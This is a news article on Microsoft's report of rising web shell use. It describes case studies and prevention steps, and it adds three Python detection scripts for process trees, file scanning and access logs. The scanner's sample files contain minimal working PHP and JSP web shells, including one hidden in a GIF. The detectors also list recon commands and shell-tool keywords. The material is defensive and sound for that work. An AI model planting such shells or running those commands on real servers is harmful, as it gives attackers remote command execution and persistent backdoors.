Microsoft sees a big increase in the use of web shells

Security personnel at Microsoft are seeing a big increase in the use of web shells, the lightweight programs that hackers install so they can burrow deeper into sites they have already compromised.

The number of web shells installed from August 2020 through January of this year averaged 144,000 per month, almost twice the figure for the same months a year earlier. The increase represents an acceleration of the growth that the same Microsoft researchers have observed in recent years.

A Swiss Army knife for hackers

The growth is a sign of how useful these simple programs are and how difficult they are to detect. A web shell is an interface that lets hackers execute arbitrary commands on a web server once the server has been compromised. Web shells are written in web programming languages such as PHP, JSP, or ASP, and the attacker drives them over ordinary HTTP requests, much as a browser would.

Once a web shell is successfully installed, remote attackers can do most of the things a legitimate administrator can. They can use it to run commands that steal data, execute malicious code, and gather system information that enables lateral movement within a network. The programs can also provide a persistent backdoor that, despite its effectiveness, is surprisingly difficult to detect.

In a blog post published Thursday, members of Microsoft’s Detection and Response Team and the Microsoft 365 Defender Research Team wrote:

Once installed on a server, web shells serve as one of the most effective means of persistence in an enterprise. We frequently see cases where web shells are used solely as a persistence mechanism. Web shells guarantee that a backdoor exists in a compromised network, because an attacker leaves a malicious implant after establishing an initial foothold on a server. If left undetected, web shells provide a way for attackers to continue to gather data from and monetize the networks that they have access to.

Compromise recovery cannot be successful and enduring without locating and removing attacker persistence mechanisms. And while rebuilding a single compromised system is a great solution, restoring existing assets is the only feasible option for many. So, finding and removing all backdoors is a critical aspect of compromise recovery.

Case studies

In early July of last year, the Metasploit hacking framework added a module that exploits a critical vulnerability in BIG-IP, F5's application delivery controller, a device typically placed between a perimeter firewall and a web application to handle load balancing and other tasks. A day later, Microsoft researchers began seeing hackers use the exploit to install web shells on vulnerable servers.

Initially, hackers used the web shells to install malware that hijacked the servers' computing power to mine cryptocurrency. Less than a week later, researchers saw hackers exploiting the BIG-IP vulnerability to install web shells for a much wider range of uses on servers belonging to the U.S. government and private industry.

In another case last year, Microsoft said it responded to an incident after a public-sector organization discovered that hackers had installed a web shell on one of its Internet-facing servers. The hackers “loaded a web shell in multiple folders on the web server, which led to the compromise of service accounts and domain admin accounts,” Microsoft researchers wrote. “This enabled the attackers to conduct reconnaissance using net.exe, scan for additional target systems using nbtstat.exe, and eventually move laterally using PsExec.”

The hackers then installed a backdoor on an Outlook Web Access server that intercepted all incoming and outgoing email, performed additional reconnaissance, and downloaded other malicious payloads. Among other things, the backdoor let the attackers send specially crafted emails that it interpreted as commands.
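
The incident above shows the process chain a web shell leaves behind: the web server's worker process runs a command interpreter, which in turn runs recon and lateral-movement tools (net.exe, nbtstat.exe, PsExec). The following is an added example, not code from Microsoft's report, that reconstructs that ancestry from process-creation telemetry and alerts when a suspicious tool descends from a web worker. The event field names (pid, ppid, image, cmdline) are an assumption modelled on generic EDR/Sysmon process-creation events, the process lists are illustrative, and the sample events are constructed; w3wp.exe is the IIS worker process.

```python
"""Flag command interpreters and recon tools that descend from a web server
process: the process-tree footprint of web shell command execution.

Added example (not Microsoft's code).  Field names and sample events are
constructed to resemble generic process-creation telemetry."""

# Processes that serve web content.  w3wp.exe is the IIS worker process; the
# rest are common *nix servers.  Extend for the stacks you actually run.
WEB_WORKERS = {"w3wp.exe", "httpd", "httpd.exe", "nginx", "php-fpm", "php-cgi.exe"}

# Children a web worker essentially never launches in normal operation.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash",
    "net.exe", "net1.exe", "nbtstat.exe", "whoami.exe", "ipconfig.exe",
    "psexec.exe", "psexec64.exe", "certutil.exe", "bitsadmin.exe",
}

# Constructed sample telemetry, loosely following the incident described above.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 640, "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "cmdline": "w3wp.exe -ap DefaultAppPool"},
    # ASP.NET compiling a page under w3wp.exe: benign, not in the suspicious list.
    {"pid": 4130, "ppid": 4120, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmdline": r"csc.exe /noconfig /fullpaths @C:\Temp\xyz.cmdline"},
    {"pid": 5010, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "whoami && net user /domain"'},
    {"pid": 5022, "ppid": 5010, "image": r"C:\Windows\System32\whoami.exe", "cmdline": "whoami"},
    {"pid": 5031, "ppid": 5010, "image": r"C:\Windows\System32\net.exe", "cmdline": "net user /domain"},
    {"pid": 5044, "ppid": 5010, "image": r"C:\Windows\System32\nbtstat.exe", "cmdline": "nbtstat -A 10.0.0.12"},
    {"pid": 5060, "ppid": 5010, "image": r"C:\inetpub\wwwroot\uploads\PsExec.exe",
     "cmdline": r"PsExec.exe \\FS01 -s cmd.exe"},
    # cmd.exe started by a scheduled task (parent unknown here): no web ancestry.
    {"pid": 7000, "ppid": 3000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c backup.bat"},
]


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows and POSIX paths alike."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(event, by_pid, max_depth=16):
    """Follow ppid links through the known events and return the chain of image
    names from the oldest known ancestor down to this event."""
    chain = [basename(event["image"])]
    cur = event
    for _ in range(max_depth):  # bounded: pid reuse can produce loops
        parent = by_pid.get(cur["ppid"])
        if parent is None or parent is cur:
            break
        chain.append(basename(parent["image"]))
        cur = parent
    return list(reversed(chain))


def detect(events):
    """Return one alert per suspicious process that has a web worker anywhere
    in its ancestry, with the reconstructed chain for the analyst."""
    by_pid = {ev["pid"]: ev for ev in events}
    alerts = []
    for ev in events:
        if basename(ev["image"]) not in SUSPICIOUS_CHILDREN:
            continue
        chain = ancestry(ev, by_pid)
        if any(name in WEB_WORKERS for name in chain[:-1]):
            alerts.append({"pid": ev["pid"], "chain": " > ".join(chain), "cmdline": ev["cmdline"]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"pid {alert['pid']}: {alert['chain']}  [{alert['cmdline']}]")
```

The walk up the ppid chain matters: net.exe's immediate parent is cmd.exe, which on its own is unremarkable, and only the grandparent w3wp.exe makes it an alert. The depth bound guards against pid reuse creating a cycle in replayed telemetry.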

Needle in a haystack

Because they are written in the same languages as legitimate web applications, web shells can be hard to find. Compounding the difficulty, web shells have several ways of receiving commands. Attackers can hide commands in the User-Agent strings and request parameters exchanged between the attacker and the compromised website. As if that weren't enough, web shells can be embedded in media files or other file formats that are not normally executable.

“When this file is loaded and analyzed on a workstation, the photo is harmless,” Microsoft researchers wrote. “But when a web browser asks a server for this file, malicious code executes server side. These challenges in detecting web shells contribute to their increasing popularity as an attack tool.”
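
The following added example (not code from Microsoft's report) makes the two points above concrete: the earlier section describes web shells as small PHP, JSP or ASP programs that pass request input to a command, and this section adds that the same code can hide inside an image that looks harmless on a workstation. The scanner below looks for a server-side script opener inside a file whose magic bytes say it is an image, and for request input flowing into command-execution or code-evaluation functions. The indicator patterns, their weights, the threshold, and the sample files (including the textbook minimal shells the scanner has to find) are all constructed for the example.

```python
"""Static web shell indicators, including code hidden inside image files.

Added example (not Microsoft's code).  Patterns, weights and samples are
illustrative; treat hits as leads for an analyst, not as proof."""
import re

# Server-side script openers.  Any of these inside an "image" is damning.
SCRIPT_TAGS = [rb"<\?php", rb"<\?=", rb"<%", rb"<script\s+runat=.server"]

# (pattern, weight, description) for code that behaves like a shell.
INDICATORS = [
    (rb"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", 3, "command execution / eval"),
    (rb"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b", 2, "reads raw request input"),
    (rb"Runtime\.getRuntime\(\)\.exec", 3, "JSP command execution"),
    (rb"request\.getParameter", 2, "reads JSP request parameter"),
    (rb"Process\.Start|CreateObject\(\s*[\"']WScript\.Shell", 3, "ASP/.NET command execution"),
    (rb"Request(\.Form|\.QueryString|\[)", 2, "reads ASP request input"),
    (rb"base64_decode|gzinflate|str_rot13|gzuncompress", 1, "payload decoding / obfuscation"),
]

# Image signatures; a file starting with one of these should contain no code.
MAGIC = {b"\xff\xd8\xff": "jpeg", b"\x89PNG\r\n\x1a\n": "png", b"GIF87a": "gif", b"GIF89a": "gif"}

THRESHOLD = 5  # polyglot alone, or execution + request input, is enough to report


def sniff(data: bytes):
    """Return the image type the magic bytes claim, or None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def scan_file(path: str, data: bytes):
    """Score one file; None when nothing shell-like reaches the threshold."""
    reasons, score = [], 0
    kind = sniff(data)
    if kind and any(re.search(tag, data) for tag in SCRIPT_TAGS):
        score += 5
        reasons.append(f"server-side script tag inside a {kind} image (polyglot)")
    for pattern, weight, desc in INDICATORS:
        if re.search(pattern, data):
            score += weight
            reasons.append(desc)
    if score >= THRESHOLD:
        return {"path": path, "score": score, "reasons": reasons}
    return None


def scan(files: dict):
    """Scan a {path: bytes} mapping and return findings, highest score first."""
    findings = (scan_file(p, d) for p, d in files.items())
    return sorted((f for f in findings if f), key=lambda f: -f["score"])


# Constructed samples.  The shells are minimal textbook forms, present only so
# the scanner has something to find; the image bytes are header stubs.
SAMPLE_FILES = {
    "wwwroot/index.php": b'<?php echo "Hello, world"; ?>',
    "wwwroot/uploads/avatar.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64,
    "wwwroot/uploads/logo.gif": b"GIF89a\x01\x00\x01\x00" + b"<?php @eval(base64_decode($_POST['x'])); ?>",
    "wwwroot/css/style.php": b"<?php system($_REQUEST['cmd']); ?>",
    "webapps/ROOT/help.jsp": b'<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    # Reads request input but never executes anything: stays below the threshold.
    "wwwroot/contact.php": b'<?php $name = htmlspecialchars($_POST["name"]); echo $name; ?>',
}


if __name__ == "__main__":
    for finding in scan(SAMPLE_FILES):
        print(f"{finding['score']:>3}  {finding['path']}: {'; '.join(finding['reasons'])}")
```

The threshold is the design choice worth noting: reading request input is what every web application does, and a lone call to a decoding function is common in legitimate code, so neither alone is reported; execution combined with request input, or any script opener inside a file that announces itself as an image, is.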

Thursday's post lists a variety of steps administrators can take to keep web shells from being installed on a server. These include:

  • Identify and remediate vulnerabilities or misconfigurations in web applications and web servers. Use threat and vulnerability management to discover and fix these weaknesses. Deploy the latest security updates as soon as they become available.
  • Implement proper segmentation of your perimeter network so that a compromised web server does not lead to the compromise of the enterprise network.
  • Enable antivirus protection on web servers. Turn on cloud-delivered protection to get the latest defenses against new and emerging threats. Users should only be able to upload files to directories that can be scanned by antivirus and that are configured to disallow server-side script creation or execution.
  • Audit and review logs from web servers regularly. Be aware of all systems you expose directly to the internet.
  • Use Windows Defender Firewall, intrusion prevention devices, and your network firewall to block command-and-control communication among endpoints wherever possible, limiting lateral movement and other attack activity.
  • Check your perimeter firewall and proxy to restrict unnecessary access to services, including access to services through non-standard ports.
  • Practice good credential hygiene. Limit the use of accounts with local or domain admin privileges.
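
Two of the recommendations above, reviewing web server logs and confining uploads to directories that never execute scripts, combine with the earlier observation that commands travel in query parameters and User-Agent strings. The following added example (not code from Microsoft's report) applies those ideas to Apache/nginx "combined" format access log lines: it flags server-side scripts requested from directories that should only hold static content, shell-like tokens in the query string or User-Agent header, and direct POSTs to a script with no referer, then counts findings per client. The directory list, token list and log lines are constructed for the example.

```python
"""Hunting web shell traffic in web server access logs.

Added example (not Microsoft's code).  Heuristics, directory list and the
sample log are constructed; tune STATIC_DIRS to the site being reviewed."""
import re
from collections import Counter

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directories that should only ever hold static content on this site (assumption).
STATIC_DIRS = ("/uploads/", "/images/", "/css/", "/js/", "/media/")
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|jsp|jspx|asp|aspx|ashx|cfm)$", re.I)

# Things that belong at a shell prompt, not in a URL or a browser's User-Agent.
COMMAND_TOKENS = re.compile(
    r"(\bcmd=|\bwhoami\b|\bnet\s+(user|group|view)\b|\bnbtstat\b|\bpowershell\b|"
    r"\bcertutil\b|/bin/sh\b|\bbase64\b|\bpsexec\b)", re.I)


def analyze_line(line: str):
    """Return a finding for one log line, or None if it looks ordinary."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    reasons = []
    if SCRIPT_EXT.search(path) and any(d in path for d in STATIC_DIRS):
        reasons.append("server-side script requested from a static-content directory")
    if COMMAND_TOKENS.search(query):
        reasons.append("shell-like token in query string")
    if COMMAND_TOKENS.search(m["ua"]):
        reasons.append("shell-like token in User-Agent")
    if m["method"] == "POST" and m["referer"] == "-" and SCRIPT_EXT.search(path):
        reasons.append("direct POST to a script with no referer")
    if not reasons:
        return None
    return {"ip": m["ip"], "method": m["method"], "target": m["target"], "reasons": reasons}


def analyze(lines):
    return [f for f in (analyze_line(line) for line in lines) if f]


def by_client(findings):
    """Findings per client IP: a shell operator tends to cluster on one source."""
    return Counter(f["ip"] for f in findings)


# Constructed sample log (RFC 5737 documentation addresses, fictional site).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2021:09:13:55 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0) Firefox/85.0"
198.51.100.9 - - [11/Feb/2021:09:13:58 +0000] "POST /login.php HTTP/1.1" 302 0 "https://www.example.org/login.php" "Mozilla/5.0 (X11; Linux x86_64) Chrome/88.0"
203.0.113.7 - - [11/Feb/2021:09:14:01 +0000] "POST /uploads/images/logo.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Feb/2021:09:14:02 +0000] "GET /uploads/images/logo.php?cmd=whoami HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Feb/2021:09:14:09 +0000] "GET /images/banner.jpg HTTP/1.1" 200 118 "-" "cmd=net user /domain"
10.0.0.5 - - [11/Feb/2021:09:14:20 +0000] "GET /blog/?p=12 HTTP/1.1" 200 8731 "https://www.example.org/" "Mozilla/5.0 (Windows NT 10.0) Firefox/85.0"
203.0.113.7 - - [11/Feb/2021:09:15:03 +0000] "POST /css/style.php HTTP/1.1" 200 211 "-" "Mozilla/5.0"
"""


if __name__ == "__main__":
    findings = analyze(SAMPLE_LOG.splitlines())
    for f in findings:
        print(f"{f['ip']} {f['method']} {f['target']}: {'; '.join(f['reasons'])}")
    print("per client:", dict(by_client(findings)))
```

The request for /images/banner.jpg is the case to notice: the path is a plain image and the response is small, so only the User-Agent gives it away, which is exactly why reviewing logs means reading the full request line and headers, not just the paths.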

The National Security Agency has published tools that help administrators detect and remove web shells on their networks.
